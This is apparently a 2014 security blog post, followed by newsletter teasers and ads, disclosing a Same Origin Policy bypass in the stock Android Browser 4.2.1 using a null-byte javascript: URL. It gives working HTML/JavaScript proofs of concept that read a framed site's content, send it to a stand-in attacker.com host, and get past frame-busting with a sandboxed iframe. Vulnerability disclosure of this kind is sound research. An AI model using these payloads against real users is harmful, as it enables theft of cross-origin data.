ad

Hacking and Cracking

Hacking and Cracking


Android Browser Same Origin Policy Bypass

Posted: 31 Aug 2014 05:11 AM PDT

Introduction

Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute. However, the fundamental are that different origins should not be able to access the properties of one another.

SOP Bypass

A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected. To best of my knowledge, the issue occurred due to improper handling of nullbytes by url parser.

The following is a proof of concept:

Proof Of Concept 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.domain)','test')" >

As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match.

However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin.

I created the following POC, so you can mess around with some stuff:

Reading the response

You can read the response of any page by accessing the document.body.innerHTML property.

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" >

Reading the response and sending it to an attackers domain

In real world situation an attacker would send the response to his controlled domain. 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Bypassing Frame Busting Code

A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.

<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Affected Versions

The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc.

The following are some of the smartphones i tested with browserstack.com.

Samsung Galaxy S3


Motrorolla Razr




Sony Xperia Tipo



HTC Evo 3D and Wildfire 


Hope you enjoyed it, Until next time. Pass the comments. 

Exclusive Updates from 'Rafay Hacking Articles'

Newsletter

Cloud Computing and the Rise of Hybrid IT

Understanding hybrid IT and how to integrate cloud into your current IT infrastructure is challenging. Click here to download
[Sponsored]

Latest News Aug 28, 2014

Remote Code Execution in PHP Explained - Part 1


This is a two part article about code execution in PHP. It's a very detailed article and contains references from other sources as well. I will discuss about some of the mistakes done by PHP developers which result in Remote Code Execution Vulnerability. It's no secret that PHP is an easy to code language; however a lot of new PHP developers lack the knowledge of basic security principles which results in to new poorly written web-application often introducing critical vulnerabilities. ...

Qmobile Noir A20 Browser And Messaging App Denial Of Service


While being impressed by Collin Mulliner's research on smart phones, I found myself very curious trying to find vulnerabilities inside it and i found several ones out. ...

Puffin Web Browser Pop Up Recursion Vulnerability - DOS

During my recent security research on "Puffin Web Browser" I found several security bugs with "Puffin Web Browser" ranging from low to high risk issues. My recent post " ...

Puffin Web Browser Address Bar Spoofing Vulnerability


During my recent research on Mobile browsers i have managed to find couple of interesting vulnerabilities such as SOP bypass, Denial of service and Address bar spoofing vulnerability which are worth doing a writeup. However, In the following writeup I would discuss about an " ...

Nokia Asha Series Lock Screen Bypass


There have been a lot of lock screen bypasses lately in almost every mobile deice such as iPhone, Samsung galaxy, HTC etc and if you observe carefully most of them rely upon abusing the " ...

Forrester Market Overview: Hosted Collaboration Services Providers

Alternatives to Google Apps and Microsoft Office 365 emerge. Click here to download
[Sponsored]

This email was sent to youbeeub.fbhacking123@blogger.com. You are receiving this newsletter because you opted-in to receive relevant communications from Rafay Hacking Articles. If you would like to manage your newsletter preferences, please click here.

Rafay Hacking Articles | Karachi, Pakistan 44000
Contact: rafayhackingarticles@gmail.com
Unsubscribe

Exclusive Updates from 'Rafay Hacking Articles'

Newsletter

When Cloud Makes Sense

Learn some of the benefits of cloud computing. Click here to download
[Sponsored]

Latest News Aug 26, 2014

Remote Code Execution in PHP Explained - Part 1


This is a two part article about code execution in PHP. It's a very detailed article and contains references from other sources as well. I will discuss about some of the mistakes done by PHP developers which result in Remote Code Execution Vulnerability. It's no secret that PHP is an easy to code language; however a lot of new PHP developers lack the knowledge of basic security principles which results in to new poorly written web-application often introducing critical vulnerabilities. ...

Qmobile Noir A20 Browser And Messaging App Denial Of Service


While being impressed by Collin Mulliner's research on smart phones, I found myself very curious trying to find vulnerabilities inside it and i found several ones out. ...

Puffin Web Browser Pop Up Recursion Vulnerability - DOS

During my recent security research on "Puffin Web Browser" I found several security bugs with "Puffin Web Browser" ranging from low to high risk issues. My recent post " ...

Puffin Web Browser Address Bar Spoofing Vulnerability


During my recent research on Mobile browsers i have managed to find couple of interesting vulnerabilities such as SOP bypass, Denial of service and Address bar spoofing vulnerability which are worth doing a writeup. However, In the following writeup I would discuss about an " ...

Nokia Asha Series Lock Screen Bypass


There have been a lot of lock screen bypasses lately in almost every mobile deice such as iPhone, Samsung galaxy, HTC etc and if you observe carefully most of them rely upon abusing the " ...

BCP Software vs. DIY: How to Make the Most Important Decision in Business Continuity Planning

Enterprises are realizing they need a more robust and dynamic toolset rather than relying solely on the static spreadsheet DIY approach when implementing Business Continuity and Disaster Recovery plans (BC/DR). Click here to download
[Sponsored]

This email was sent to youbeeub.fbhacking123@blogger.com. You are receiving this newsletter because you opted-in to receive relevant communications from Rafay Hacking Articles. If you would like to manage your newsletter preferences, please click here.

Rafay Hacking Articles | Karachi, Pakistan 44000
Contact: rafayhackingarticles@gmail.com
Unsubscribe